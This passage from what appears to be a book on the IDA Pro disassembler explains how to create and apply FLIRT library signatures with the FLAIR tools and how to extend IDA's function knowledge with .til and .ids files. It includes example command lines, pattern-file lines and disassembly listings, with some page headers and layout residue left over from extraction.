WARNING Only functions named with an IDA dummy name can be automatically renamed. In

other words, if you have renamed a function, and that function is later matched by a

signature, then the function will not be renamed as a result of the match. Therefore, it

is to your benefit to apply signatures as early in your analysis process as possible.

Recall that statically linked binaries blur the distinction between applica-

tion code and library code. If you are fortunate enough to have a statically

linked binary that has not had its symbols stripped, you will at least have

useful function names (as useful as the trustworthy programmer has chosen

Library Recognition Using FLIRT Signatures 215

to create) to help you sort your way through the code. However, if the binary

has been stripped, you will have perhaps hundreds of functions, all with

IDA-generated names that fail to indicate what the function does. In both

cases, IDA will be able to identify library functions only if signatures are

available (function names in an unstripped binary do not provide IDA with

enough information to definitively identify a function as a library function).

Figure 12-2 shows the Overview Navigator for a statically linked binary.

Figure 12-2: Statically linked with no signatures

In this display, no functions have been identified as library functions, so

you may find yourself analyzing far more code than you really need to. After

application of an appropriate set of signatures, the Overview Navigator is

transformed as shown in Figure 12-3.

Figure 12-3: Statically linked binary with signatures applied

As you can see, the Overview Navigator provides the best indication of

the effectiveness of a particular set of signatures. With a large percentage of

matched signatures, substantial portions of code will be marked as library

code and renamed accordingly. In the example in Figure 12-3, it is highly

likely that the actual application-specific code is concentrated in the far left

portion of the navigator display.

There are two points worth remembering when applying signatures.

First, signatures are useful even when working with a binary that has not

been stripped, in which case you are using signatures more to help IDA

identify library functions than to rename those functions. Second, statically

linked binaries may be composed of several separate libraries, requiring the

application of several sets of signatures in order to completely identify all

library functions. With each additional signature application, additional

portions of the Overview Navigator will be transformed to reflect the discovery

of library code. Figure 12-4 shows one such example. In this figure, you see

a binary that was statically linked with both the C standard library and the

OpenSSL5 cryptographic library.

Figure 12-4: Static binary with first of several signatures applied

5. See http://www.openssl.org/.

216 Chapter 12

Specifically, you see that following application of the appropriate signa-

tures for the version of OpenSSL in use in this application, IDA has marked

a small band (the lighter band toward the left edge of the address range) as

library code. Statically linked binaries are often created by taking the applica-

tion code first and then appending required libraries to create the resulting

executable. Given this picture, we can conclude that the memory space to

the right of the OpenSSL library is likely occupied by additional library code,

while the application code is most likely in the very narrow band to the left of

the OpenSSL library. If we continue to apply signatures to the binary shown

in Figure 12-4, we eventually arrive at the display of Figure 12-5.

Figure 12-5: Static binary following application of several signatures

In this example, we have applied signatures for libc, libcrypto, libkrb5,

libresolv, and others. In some cases we selected signatures based on strings

located within the binary; in other cases we chose signatures based on their

close relationship to other libraries already located within the binary. The

resulting display continues to show a dark band in the middle of the naviga-

tion band and a smaller dark band at the extreme left edge of the navigation

band. Further analysis is required to determine the nature of these remaining

nonlibrary portions of the binary. In this case we would learn that the wider

dark band in the middle is part of an unidentified library, while the dark

band on the left is the application code.

Creating FLIRT Signature Files

As we discussed previously, it is simply impractical for IDA to ship with signa-

ture files for every static library in existence. In order to provide IDA users

with the tools and information necessary to create their own signatures, Hex-

Rays distributes the Fast Library Acquisition for Identification and Recogni-

tion (FLAIR) tool set. The FLAIR tools are made available on your IDA

distribution CD or via download from the Hex-Rays website6 for authorized

customers. Like several other IDA add-ons, the FLAIR tools are distributed in

a Zip file. Hex-Rays does not necessarily release a new version of the FLAIR

tools with each version of IDA, so you should use the most recent version of

FLAIR that does not exceed your version of IDA.

Installation of the FLAIR utilities is a simple matter of extracting the

contents of the associated Zip file, though we highly recommend that you

create a dedicated flair directory as the destination because the Zip file is not

organized with a top-level directory. Inside the FLAIR distribution you will

6. The current version is flair61.zip and is available here: http://www.hex-rays.com/idapro/ida/

flair61.zip. A username and password supplied by Hex-Rays are required to access the download.

Library Recognition Using FLIRT Signatures 217

find several text files that constitute the documentation for the FLAIR tools.

Files of particular interest include these:

readme.txt

This is a top-level overview of the signature-creation process.

plb.txt

This file describes the use of the static library parser, plb.exe. Library pars-

ers are discussed in more detail in “Creating Pattern Files” on page 219.

pat.txt

This file details the format of pattern files, which represent the first

step in the signature-creation process. Pattern files are also described

in “Creating Pattern Files” on page 219.

sigmake.txt

This file describes the use of sigmake.exe for generating .sig files from

pattern files. Please refer to “Creating Signature Files” on page 221 for

more details.

Additional top-level content of interest includes the bin directory, which

contains all of the FLAIR tools executable files, and the startup directory,

which contains pattern files for common startup sequences associated with

various compilers and their associated output file types (PE, ELF, and so on).

Prior to version 6.1, the FLAIR tools area is available for Windows only; how-

ever, the resulting signature files may be used with all IDA variants (Windows,

Linux, and OS X).

Signature-Creation Overview

The basic process for creating signatures files does not seem complicated, as

it boils down to four simple-sounding steps.

1. Obtain a copy of the static library for which you wish to create a signa-

ture file.

2. Utilize one of the FLAIR parsers to create a pattern file for the library.

3. Run sigmake.exe to process the resulting pattern file and generate a

signature file.

4. Install the new signature file in IDA by copying it to <IDADIR>/sig.

Unfortunately, in practice, only the last step is as easy as it sounds. In the

following sections, we discuss the first three steps in more detail.

Identifying and Acquiring Static Libraries

The first step in the signature-generation process is to locate a copy of the

static library for which you wish to generate signatures. This can pose a bit of

a challenge for a variety of reasons. The first obstacle is to determine which

library you actually need. If the binary you are analyzing has not been stripped,

218 Chapter 12

you might be lucky enough to have actual function names available in your

disassembly, in which case an Internet search will probably provide several

pointers to likely candidates.

Stripped binaries are not quite as forthcoming regarding their origins.

Lacking function names, you may find that a good strings search may yield

sufficiently unique strings to allow for library identification, such as the follow-

ing, which is a dead giveaway:

OpenSSL 1.0.0b-fips 16 Nov 2010

once again you can use an Internet search to narrow your candidates. If you

choose to run strings from the command line, remember to use the -a

option to force strings to scan the entire binary; otherwise you may miss

some potentially useful string data.

In the case of open source libraries, you are likely to find source code

readily available. Unfortunately, while the source code may be useful in help-

ing you understand the behavior of the binary, you cannot use it to generate

your signatures. It might be possible to use the source to build your own ver-

sion of the static library and then use that version in the signature-generation

process. However, in all likelihood, variations in the build process will result

in enough differences between the resulting library and the library you are

analyzing that any signatures you generate will not be terribly accurate.

The best option is to attempt to determine the exact origin of the binary

in question. By this we mean the exact operating system, operating system

version, and distribution (if applicable). Given this information, the best

option for creating signatures is to copy the libraries in question from an

identically configured system. Naturally, this leads to the next challenge:

Given an arbitrary binary, on what system was it created? A good first step

is to use the file utility to obtain some preliminary information about the

binary in question. In Chapter 2 we saw some sample output from file. In

several cases, this output was sufficient to provide likely candidate systems.

The following is just one example of very specific output from file:

$ file sample_file_1

sample_file_1: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD),

statically linked, for FreeBSD 8.0 (800107), stripped

In this case we might head straight to a FreeBSD 8.0 system and track

down libc.a for starters. The following example is somewhat more ambiguous,

however:

$ file sample_file_2

sample_file_2: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux),

statically linked, for GNU/Linux 2.6.32, stripped

Library Recognition Using FLIRT Signatures 219

We appear to have narrowed the source of the file to a Linux system,

which, given the abundance of available Linux distributions, is not saying

much. Turning to strings we find the following:

GCC: (GNU) 4.5.1 20100924 (Red Hat 4.5.1-4)

Here the search has been narrowed to Red Hat distributions (or deriv-

atives) that shipped with gcc version 4.5.1. GCC tags such as this are not

uncommon in binaries compiled using gcc, and fortunately for us, they

survive the stripping process and remain visible to strings.

Keep in mind that the file utility is not the be all and end all in file

identification. The following output demonstrates a simple case in which

file seems to know the type of the file being examined but for which the

output is rather nonspecific.

$ file sample_file_3

sample_file_3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),

dynamically linked (uses shared libs), stripped

This example was taken from a Solaris 10 x86 system. Here again, the

strings utility might be useful in pinpointing this fact.

Creating Pattern Files

At this point you should have one or more libraries for which you wish to

create signatures. The next step is to create a pattern file for each library.

Pattern files are created using an appropriate FLAIR parser utility. Like

executable files, library files are built to various file format specifications.

FLAIR provides parsers for several popular library file formats. As detailed

in FLAIR’s readme.txt file, the following parsers can be found in FLAIR’s bin

directory:

plb.exe/plb

Parser for OMF libraries (commonly used by Borland compilers)

pcf.exe/pcf

Parser for COFF libraries (commonly used by Microsoft compilers)

pelf.exe/pelf

Parser for ELF libraries (found on many Unix systems)

ppsx.exe/ppsx

Parser for Sony PlayStation PSX libraries

ptmobj.exe/ptmobj

Parser for TriMedia libraries

pomf166.exe/pomf166

Parser for Kiel OMF 166 object files

220 Chapter 12

To create a pattern file for a given library, specify the parser that corre-

sponds to the library’s format, the name of the library you wish to parse,

and the name of the resulting pattern file that should be generated. For a

copy of libc.a from a FreeBSD 8.0 system, you might use the following:

$ ./pelf libc.a libc_FreeBSD80.pat

libc.a: skipped 1, total 1089

Here, the parser reports the file that was parsed (libc.a), the number of

functions that were skipped (1),7 and the number of signature patterns

that were generated (1089). Each parser accepts a slightly different set of

command-line options documented only through the parser’s usage state-

ment. Executing a parser with no arguments displays the list of command-

line options accepted by that parser. The plb.txt file contains more detailed

information on the options accepted by the plb parser. This file is a good

basic source of information, since other parsers accept many of the options

it describes as well. In many cases, simply naming the library to be parsed and

the pattern file to be generated is sufficient.

A pattern file is a text file that contains, one per line, the extracted pat-

terns that represent functions within a parsed library. A few lines from the

pattern file created previously are shown here:

57568B7C240C8B742410FC8B4C2414C1E902F3A775108B4C241483E103F3A675 1E A55D 003E :0000 _memcmp

0FBC442404740340C39031C0C3...................................... 00 0000 000D :0000 _ffs

57538B7C240C8B4C2410FC31C083F90F7E1B89FAF7DA83E20389CB29D389D1F3 12 9E31 0032 :0000 _bzero

The format of an individual pattern is described in FLAIR’s pat.txt file. In

a nutshell, the first portion of a pattern lists the initial byte sequence of the

function to a maximum of 32 bytes. Allowance is made for bytes that may vary

as a result of relocation entries. Such bytes are displayed using two dots. Dots

are also used to fill the pattern out to 64 characters8 when a function is shorter

than 32 bytes (as _ffs is in the previous code). Beyond the initial 32 bytes,

additional information is recorded to provide more precision in the signature-

matching process. Additional information encoded into each pattern line

includes a CRC169 value computed over a portion of the function, the length

of the function in bytes, and a list of symbol names referenced by the function.

In general, longer functions that reference many other symbols yield more

complex pattern lines. In the file libc_FreeBSD80.pat generated previously,

some pattern lines exceed 20,000 characters in length.

7. The plb and pcf parsers may skip some functions depending on the command-line options

supplied to the parsers and the structure of the library being parsed.

8. At two characters per byte, 64 hexadecimal characters are required to display the contents of

32 bytes.

9. This is a 16-bit cyclic redundancy check value. The CRC16 implementation utilized for

pattern generation is included with the FLAIR tool distribution in the file crc16.cpp.

Library Recognition Using FLIRT Signatures 221

Several third-party programmers have created utilities designed to gen-

erate patterns from existing IDA databases. One such utility is IDB_2_PAT,10

an IDA plug-in written by J.C. Roberts that is capable of generating patterns

for one or more functions in an existing database. Utilities such as these are

useful if you expect to encounter similar code in additional databases and

have no access to the original library files used to create the binary being

analyzed.

Creating Signature Files

Once you have created a pattern file for a given library, the next step in the

signature-creation process is to generate a .sig file suitable for use with IDA.

The format of an IDA signature file is substantially different from that of a

pattern file. Signature files utilize a proprietary binary format designed both

to minimize the amount of space required to represent all of the information

present in a pattern file and to allow for efficient matching of signatures

against actual database content. A high-level description of the structure of

a signature file is available on the Hex-Rays website.11

FLAIR’s sigmake utility is used to create signature files from pattern files.

By splitting pattern generation and signature generation into two distinct

phases, the signature-generation process is completely independent of the

pattern-generation process, which allows for the use of third-party pattern

generators. In its simplest form, signature generation takes place by using

sigmake to parse a .pat file and create a .sig file, as shown here:

$ ./sigmake libssl.pat libssl.sig

If all goes well, a .sig file is generated and ready to install into <IDADIR>/

sig. However, the process seldom runs that smoothly.

NOTE The sigmake documentation file, sigmake.txt, recommends that signature filenames

follow the MS-DOS 8.3 name-length convention. This is not a hard-and-fast require-

ment, however. When longer filenames are used, only the first eight characters of the

base filename are displayed in the signature-selection dialog.

Signature generation is often an iterative process, as it is during this phase

when collisions must be handled. A collision occurs anytime two functions

have identical patterns. If collisions are not resolved in some manner, it is

not possible to determine which function is actually being matched during

the signature-application process. Therefore, sigmake must be able to resolve

each generated signature to exactly one function name. When this is not

possible, based on the presence of identical patterns for one or more func-

tions, sigmake refuses to generate a .sig file and instead generates an exclusions

10. See http://www.openrce.org/downloads/details/26/IDB_2_PAT.

11. See http://www.hex-rays.com/idapro/flirt.htm.

222 Chapter 12

file (.exc). A more typical first pass using sigmake and a new .pat file (or set of

.pat files) might yield the following.

$ ./sigmake libc_FreeBSD80.pat libc_FreeBSD80.sig

libc_FreeBSD80.sig: modules/leaves: 1088/1024, COLLISIONS: 10

See the documentation to learn how to resolve collisions.

The documentation being referred to is sigmake.txt, which describes the

use of sigmake and the collision-resolution process. In reality, each time sigmake

is executed, it searches for a corresponding exclusions file that might contain

information on how to resolve any collisions that sigmake may encounter while

processing the named pattern file. In the absence of such an exclusions file,

and when collisions occur, sigmake generates such an exclusions file rather

than a signature file. In the previous example, we would find a newly created

file named libc_FreeBSD80.exc. When first created, exclusions files are text files

that detail the conflicts that sigmake encountered while processing the pattern

file. The exclusions file must be edited to provide sigmake with guidance as to

how it should resolve the conflicting patterns. The general process for editing

an exclusions file follows.

When generated by sigmake, all exclusions files begin with the following

lines:

;--------- (delete these lines to allow sigmake to read this file)

; add '+' at the start of a line to select a module

; add '-' if you are not sure about the selection

; do nothing if you want to exclude all modules

The intent of these lines it to remind you what to do to resolve collisions

before you can successfully generate signatures. The most important thing to

do is delete the four lines that begin with semicolons, or sigmake will fail to

parse the exclusions file during subsequent execution. The next step is to

inform sigmake of your desire for collision resolution. A few lines extracted

from libc_FreeBSD80.exc appear here:

_index 00 0000 538B4424088A4C240C908A1838D974074084DB75F531C05BC3..............

_strchr 00 0000 538B4424088A4C240C908A1838D974074084DB75F531C05BC3..............

_rindex 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3..........

_strrchr 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3..........

_flsl 01 EF04 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89D0

_fls 01 EF04 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89D0

These lines detail three separate collisions. In this case, we are being told

that the function index is indistinguishable from strchr, rindex has the same

signature as strrchr, and flsl collides with fls. If you are familiar with any of

these functions, this result may not surprise you, as the colliding functions are

essentially identical (for example, index and strchr perform the same action).

Library Recognition Using FLIRT Signatures 223

In order to leave you in control of your own destiny, sigmake expects you

to designate no more than one function in each group as the proper function

for the associated signature. You select a function by prefixing the name with

a plus character (+) if you want the name applied anytime the corresponding

signature is matched in a database or a minus character (-) if you simply want

a comment added to the database whenever the corresponding signature is

matched. If you do not want any names applied when the corresponding

signature is matched in a database, then you do not add any characters. The

following listing represents one possible way to provide a valid resolution for

the three collisions noted previously:

+_index 00 0000 538B4424088A4C240C908A1838D974074084DB75F531C05BC3..............

_strchr 00 0000 538B4424088A4C240C908A1838D974074084DB75F531C05BC3..............

_rindex 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3..........

_strrchr 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3..........

_flsl 01 EF04 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89D0

-_fls 01 EF04 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89D0

In this case we elect to use the name index whenever the first signature is

matched, do nothing at all when the second signature is matched, and have

a comment about fls added when the third signature is matched. The fol-

lowing points are useful when attempting to resolve collisions:

1. To perform minimal collision resolution, simply delete the four com-

mented lines at the beginning of the exclusions file.

2. Never add a +/- to more than one function in a collision group.

3. If a collision group contains only a single function, do not add a +/- in

front of that function; simply leave it alone.

4. Subsequent failures of sigmake cause data, including comment lines, to

be appended to any existing exclusions file. This extra data should be

removed and the original data corrected (if the data was correct, sigmake

would not have failed a second time) before rerunning sigmake.

Once you have made appropriate changes to your exclusions file, you

must save the file and rerun sigmake using the same command-line arguments

that you used initially. The second time through, sigmake should locate, and

abide by, your exclusions file, resulting in the successful generation of a .sig

file. Successful operation of sigmake is noted by the lack of error messages and

the presence of a .sig file, as shown here:

$ ./sigmake libc_FreeBSD80.pat libc_FreeBSD80.sig

After a signature file has been successfully generated, you make it available

to IDA by copying it to your <IDADIR>/sig directory. Then your new signatures

are available using FileLoad FileFLIRT Signature File.

224 Chapter 12

Note that we have purposefully glossed over all of the options that can be

supplied to both the pattern generators and sigmake. A rundown of available

options is provided in plb.txt and sigmake.txt. The only option we will make

note of is the -n option used with sigmake. This option allows you to embed a

descriptive name inside a generated signature file. This name is displayed

during the signature-selection process (see Figure 12-1), and it can be very

helpful when sorting through the list of available signatures. The following

command line embeds the name string “FreeBSD 8.0 C standard library”

within the generated signature file:

$ ./sigmake -n"FreeBSD 8.0 C standard library" libc_FreeBSD80.pat libc_FreeBSD80.sig

As an alternative, library names can be specified using directives within

exclusion files. However, since exclusion files may not be required in all

signature-generation cases, the command-line option is generally more use-

ful. For further details, please refer to sigmake.txt.

Startup Signatures

IDA also recognizes a specialized form of signatures called startup signatures.

Startup signatures are applied when a binary is first loaded into a database in

an attempt to identify the compiler that was used to create the binary. If IDA

can identify the compiler used to build a binary, then additional signature

files, associated with the identified compiler, are automatically loaded during

the initial analysis of the binary.

Given that the compiler type is initially unknown when a file is first loaded,

startup signatures are grouped by and selected according to the file type of

the binary being loaded. For example, if a Windows PE binary is being loaded,

then startup signatures specific to PE binaries are loaded in an effort to

determine the compiler used to build the PE binary in question.

In order to generate startup signatures, sigmake processes patterns that

describe the startup routine12 generated by various compilers and groups

the resulting signatures into a single type-specific signature file. The startup

directory in the FLAIR distribution contains the startup patterns used by

IDA, along with the script, startup.bat, used to create the corresponding

startup signatures from those patterns. Refer to startup.bat for examples of

using sigmake to create startup signatures for a specific file format.

In the case of PE files, you would notice several pe_*.pat files in the startup

directory that describe startup patterns used by several popular Windows

compilers, including pe_vc.pat for Visual Studio patterns and pe_gcc.pat for

Cygwin/gcc patterns. If you wish to add additional startup patterns for PE

files, you would need to add them to one of the existing PE pattern files or

create a new pattern file with a pe_ prefix in order for the startup signature-

generation script to properly find your patterns and incorporate them into

the newly generated PE signatures.

12. The startup routine is generally designated as the program’s entry point. In a C/C++

program, the purpose of the startup routine is to initialize the program’s environment prior to

passing control to the main function.

Library Recognition Using FLIRT Signatures 225

One last note about startup patterns concerns their format, which unfortu-

nately is slightly different from patterns generated for library functions. The

difference lies in the fact that a startup pattern line is capable of relating the

pattern to additional sets of signatures that should also be applied if a match

against the pattern is made. Other than the example startup patterns included

in the startup directory, the format of a startup pattern is not documented in

any of the text files included with FLAIR.

Summary

Automated library code identification is an essential capability that sig-

nificantly reduces the amount of time required to analyze statically linked

binaries. With its FLIRT and FLAIR capabilities, IDA makes such automated

code recognition not only possible but extensible by allowing users to create

their own library signatures from existing static libraries. Familiarity with the

signature-generation process is an essential skill for anyone who expects to

encounter statically linked binaries.

JMP

EBP

SUB

EXTENDING IDA’S KNOWLEDGE

By now it should be clear that a high-quality

disassembly is much more than a list of

mnemonics and operands derived from a

sequence of bytes. In order to make a disassembly

useful, it is important to augment the disassembly with

information derived from the processing of various

API-related data such as function prototypes and standard datatypes. In

Chapter 8 we discussed IDA’s handling of data structures, including how to

access standard API data structures and how to define your own custom data

structures. In this chapter, we continue our discussion of extending IDA’s

knowledge by examining the use of IDA’s idsutils and loadint utilities.

These utilities are available on your IDA distribution CD or via download

at the Hex-Rays download site.1

1. See http://www.hex-rays.com/idapro/idadown.htm. A valid IDA username and password are

required.

228 Chapter 13

Augmenting Function Information

IDA derives its knowledge of functions from two sources: type library (.til)

files and IDS utilities (.ids) files. During the initial analysis phase, IDA uses

information stored in these files to both improve the accuracy of the dis-

assembly and make the disassembly more readable. It does so by incorporating

function parameter names and types as well as comments that have been

associated with various library functions.

In Chapter 8 we discussed type library files as the mechanism by which

IDA stores the layout of complex data structures. Type library files are also

the means by which IDA records information about a function’s calling

conventions and parameter sequence. IDA uses function signature informa-

tion in several ways. First, when a binary uses shared libraries, IDA has no way

to know what calling conventions may be employed by the functions in those

libraries. In such cases, IDA attempts to match library functions against their

associated signatures in a type library file. If a matching signature is found,

IDA can understand the calling convention used by the function and make

adjustments to the stack pointer as necessary (recall that stdcall functions

perform their own stack cleanup). The second use for function signatures is

to annotate the parameters being passed to a function with comments that

denote exactly which parameter is being pushed on the stack prior to calling

the function. The amount of information present in the comment depends

on how much information was present in the function signature that IDA was

able to parse. The two signatures that follow are both legal C declarations,

though the second provides more insight into the function, as it provides

formal parameter names in addition to datatypes.

LSTATUS _stdcall RegOpenKey(HKEY, LPCTSTR, PHKEY);

LSTATUS _stdcall RegOpenKey(HKEY hKey, LPCTSTR lpSubKey, PHKEY phkResult);

IDA’s type libraries contain signature information for a large number of

common API functions, including a substantial portion of the Windows API.

A default disassembly of a call to the RegOpenKey function is shown here:

.text:00401006 00C lea eax, [ebp+YhKey]

.text:00401009 00C push eax X; phkResult

.text:0040100A 010 push offset YSubKey ; "Software\\Hex-Rays\\IDA"

.text:0040100F 014 push 80000001h X; hKey

.text:00401014 018 call ds:RegOpenKeyA

.text:0040101A Z00C mov [ebp+var_8], eax

Note that IDA has added comments in the right margin X, indicating

which parameter is being pushed at each instruction leading up to the

call to RegOpenKey. When formal parameter names are available in the function

signature, IDA attempts to go one step further and automatically name

variables that correspond to specific parameters. In two cases in the preceding

Extending IDA’s Knowledge 229

example Y, we can see that IDA has named a local variable (hKey) and a

global variable (SubKey) based on their correspondence with formal para-

meters in the RegOpenKey prototype. If the parsed function prototype had

contained only type information and no formal parameter names, then

the comments in the preceding example would name the datatypes of the

corresponding arguments rather than the parameter names. In the case of

the lpSubKey parameter, the parameter name is not displayed as a comment

because the parameter happens to point to a global string variable, and the

content of the string is being displayed using IDA’s repeating comment

facility. Finally, note that IDA has recognized RegOpenKey as a stdcall function

and automatically adjusted the stack pointer Z as RegOpenKey would do upon

returning. All of this information is extracted from the function’s signature,

which IDA also displays as a comment within the disassembly at the

appropriate import table location, as shown in the following listing:

.idata:0040A000 ; LSTATUS __stdcall RegOpenKeyA(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult)

.idata:0040A000 extrn RegOpenKeyA:dword ; CODE XREF: _main+14p

.idata:0040A000 ; DATA XREF: _main+14r

The comment displaying the function prototype comes from an IDA .til

file containing information on Windows API functions.

Under what circumstances might you wish to generate your own function

type signatures?2 Whenever you encounter a binary that is linked, either

dynamically or statically, to a library for which IDA has no function prototype

information, you may want to generate type signature information for all

of the functions contained in that library in order to provide IDA with the

ability to automatically annotate your disassembly. Examples of such libraries

might include common graphics or encryption libraries that are not part of a

standard Windows distribution but that might be in widespread use. The

OpenSSL cryptographic library is one example of such a library.

Just as we were able to add complex datatype information to a database’s

local .til file in Chapter 8, we can add function prototype information to that

same .til file by having IDA parse one or more function prototypes via File

Load FileParse C Header File. Similarly, you may use tilib.exe (see Chapter 8)

to parse header files and create standalone .til files, which can be made glo-

bally available by copying them into <IDADIR>/til.

This is all well and good when you happen to have access to source code

that you then allow IDA (or tilib.exe)to parse on your behalf. Unfortunately,

more often than you would like, you will have no access to source code, yet

you will want the same high-quality disassembly. How can you go about edu-

cating IDA if you have no source code for it to consume? This is the precisely

the purpose of the IDS utilities, or idsutils. The IDS utilities are a set of three

utility programs used to create .ids files. We first discuss what a .ids file is and

then turn our attention to creating our own .ids files.

2. In this case we are using the term signature to refer to a function’s parameter type(s), quantity,

and sequence rather than a pattern of code to match the compiled function.

230 Chapter 13

IDS Files

IDA uses .ids files to supplement its knowledge of library functions. A .ids

file describes the content of a shared library by listing every exported function

contained within the library. Information detailed for each function includes

the function’s name, its associated ordinal number,3 whether the function

utilizes stdcall, and if so, how many bytes the function clears from the stack

3. An ordinal number is an integer index associated with each exported function. The use of

ordinals allows a function to be located using an integer lookup table rather than by a slower

string comparison against the function’s name.

MANUALLY OVERRIDING PURGED BYTES

Library functions that make use of the stdcall calling convention can wreak havoc

with IDA’s stack-pointer analysis. Lacking any type library or .ids file information, IDA

has no way of knowing whether an imported function uses the stdcall convention.

This is significant, as IDA may not be able to properly track the behavior of the stack

pointer across calls to functions for which it has no calling convention information.

Beyond knowing that a function utilizes stdcall, IDA must also know exactly how

many bytes the function removes from the stack when the function completes. Lacking

information on calling conventions, IDA attempts to automatically determine whether

a function utilizes stdcall using a mathematical analysis technique known as the

simplex method.* Alternatively, users may intervene manually to specify the number

of purged bytes themselves. Figure 13-1 shows a specialized form of the function

editing dialog used for imported functions.

Figure 13-1: Editing an imported function

You can access this dialog by navigating to the import table entry for a given

function and then editing the function (EditFunctionsEdit Function, or ALT-P). Note

the limited functionality of this particular dialog (as opposed to the Edit Function dialog

of Figure 7-7). Because this is an imported function entry, IDA has no access to the

compiled body of the function and therefore no associated information regarding the

structure of the function’s stack frame and no direct evidence that the function uses

the stdcall convention. Lacking such information, IDA sets the Purged bytes field to

-1, indicating that it does not know whether the function clears any bytes from the

stack upon return. To override IDA in such cases, enter the correct value for the

number of purged bytes, and IDA will incorporate the provided information into its

stack-pointer analysis wherever the associated function is called. In cases for which

IDA is aware of the behavior of the function (as in Figure 13-1), the Purged bytes

field may already be filled in. Note that this field is never filled in as a result of

simplex method analysis.

* Use of the simplex method as introduced in IDA version 5.1 is described in a blog post by

Ilfak here: http://www.hexblog.com/2006/06/.

Extending IDA’s Knowledge 231

upon return, and optional comments to be displayed when the function is

referenced within a disassembly. In practice, .ids files are actually compressed

.idt files, with .idt files containing the textual descriptions of each library

function.

When an executable file is first loaded into a database, IDA determines

which shared library files the executable depends on. For each shared library,

IDA searches for a corresponding .ids file in the <IDADIR>/ids hierarchy in

order to obtain descriptions of any library functions that the executable may

reference. It is important to understand that .ids files do not necessarily

contain function signature information. Therefore, IDA may not provide

function parameter analysis based on information contained solely in .ids

files. IDA can, however, perform accurate stack pointer accounting when a

.ids file contains correct information concerning the calling conventions

employed by functions and the number of bytes that the functions clear from

the stack. In situations where a DLL exports mangled names, IDA may be

able to infer a function’s parameter signature from the mangled name, in

which case this information becomes available when the .ids file is loaded.

We describe the syntax of .idt files in the next section. In this regard, .til files

contain more useful information with respect to disassembling function calls,

though source code is required in order to generate .til files.

Creating IDS Files

IDA’s idsutils utilities are used to create .ids files. The utilities include two

library parsers, dll2idt for extracting information from Windows DLLs and

ar2idt for extracting information from ar-style libraries. In both cases, the

output is a text .idt file containing a single line per exported function that

maps the exported function’s ordinal number to the function’s name. The

syntax for .idt files, which is very straightforward, is described in the readme.txt

file included with idsutils. The majority of lines in a .idt file are used to

describe exported functions according to the following scheme:

zAn export entry begins with a positive number. This number represents

the ordinal number of the exported function.

zThe ordinal number is followed by a space and then a Name directive

in the form Name=function, for example, Name=RegOpenKeyA. If the special

ordinal value zero is used, then the Name directive is used to specify the

name of the library described in the current .idt file, such as in this

example:

0 Name=advapi32.dll

zAn optional Pascal directive may be used to specify that a function

uses the stdcall calling convention and to indicate how many bytes

the function removes from the stack upon return. Here is an example:

483 Name=RegOpenKeyA Pascal=12

232 Chapter 13

zAn optional Comment directive can be appended to an export entry to

specify a comment to be displayed with the function at each reference to

the function within a disassembly. A completed export entry might look

like the following:

483 Name=RegOpenKeyA Pascal=12 Comment=Open a registry key

Additional, optional directives are described in the idsutils readme.txt

file. The purpose of the idsutils parsing utilities is to automate, as much

as possible, the creation of .idt files. The first step in creating a .idt file is to

obtain a copy of the library that you wish to parse; the next step is to parse it

using the appropriate parsing utility. If we wished to create a .idt file for the

OpenSSL-related library ssleay32.dll, we would use the following command:

$ ./dll2idt.exe ssleay32.dll

File: ssleay32.dll ... ok

Successful parsing in this case results in a file named SSLEAY32.idt.

The difference in capitalization between the input filename and the output

filename is due to the fact that dll2idt derives the name of the output file

based on information contained within the DLL itself. The first few lines of

the resulting .idt file are shown here:

ALIGNMENT 4

;DECLARATION

;

0 Name=SSLEAY32.dll

;

121 Name=BIO_f_ssl

173 Name=BIO_new_buffer_ssl_connect

122 Name=BIO_new_ssl

174 Name=BIO_new_ssl_connect

124 Name=BIO_ssl_copy_session_id

Note that it is not possible for the parsers to determine whether a func-

tion uses stdcall and, if so, how many bytes are purged from the stack. The

addition of any Pascal or Comment directives must be performed manually using

a text editor prior to creating the final .ids file. The final steps for creating

a.ids are to use the zipids utility to compress the .idt file and then to copy the

resulting .ids file to <IDADIR>/ids.

$ ./zipids.exe SSLEAY32.idt

File: SSLEAY32.idt ... {219 entries [0/0/0]} packed

$ cp SSLEAY32.ids ../Ida/ids

At this point, IDA loads SSLEAY32.ids anytime a binary that links to

ssleay32.dll is loaded. If you elect not to copy your newly created .ids files into

<IDADIR>/ids, you can load them at any time via FileLoad FileIDS File.

Extending IDA’s Knowledge 233

An additional step in the use of .ids files allows you to link .ids files to

specific .sig or .til files. When you choose .ids files, IDA utilizes an IDS config-

uration file named <IDADIR>/ida/idsnames. This text file contains lines to

allow for the following:

zMap a shared library name to its corresponding .ids filename. This allows

IDA to locate the correct .ids file when a shared library name does not

translate neatly to an MS-DOS–style 8.3 filename as with the following:

libc.so.6 libc.ids +

zMap a .ids file to a .til file. In such cases, IDA automatically loads the

specified .til file whenever it loads the specified .ids file. The following

example would cause openssl.til to be loaded anytime SSLEAY32.ids is

loaded (see idsnames for syntax details):

SSLEAY32.ids SSLEAY32.ids + openssl.til

zMap a .sig file to a corresponding .ids file. In this case, IDA loads the

indicated .ids file anytime the named .sig file is applied to a disassembly.

The following line directs IDA to load SSLEAY32.ids anytime a user applies

the libssl.sig FLIRT signature:

libssl.sig SSLEAY32.ids +

In Chapter 15 we will look at a script-oriented alternative to the library

parsers provided by idsutils, and we’ll leverage IDA’s function-analysis

capabilities to generate more descriptive .idt files.

Augmenting Predefined Comments with loadint

In Chapter 7 we covered IDA’s concept of auto comments, which, when enabled,

cause IDA to display comments describing each assembly language instruction.

Two examples of such comments are shown in the following listing:

.text:08048654 lea ecx, [esp+arg_0] ; Load Effective Address

.text:08048658 and esp, 0FFFFFFF0h ; Logical AND

The source of these predefined comments is the file <IDADIR>/ida.int,

which contains comments sorted first by CPU type and second by instruction

type. When auto comments are turned on, IDA searches for comments

associated with each instruction in the disassembly and displays them in the

right margin if they are present in ida.int.

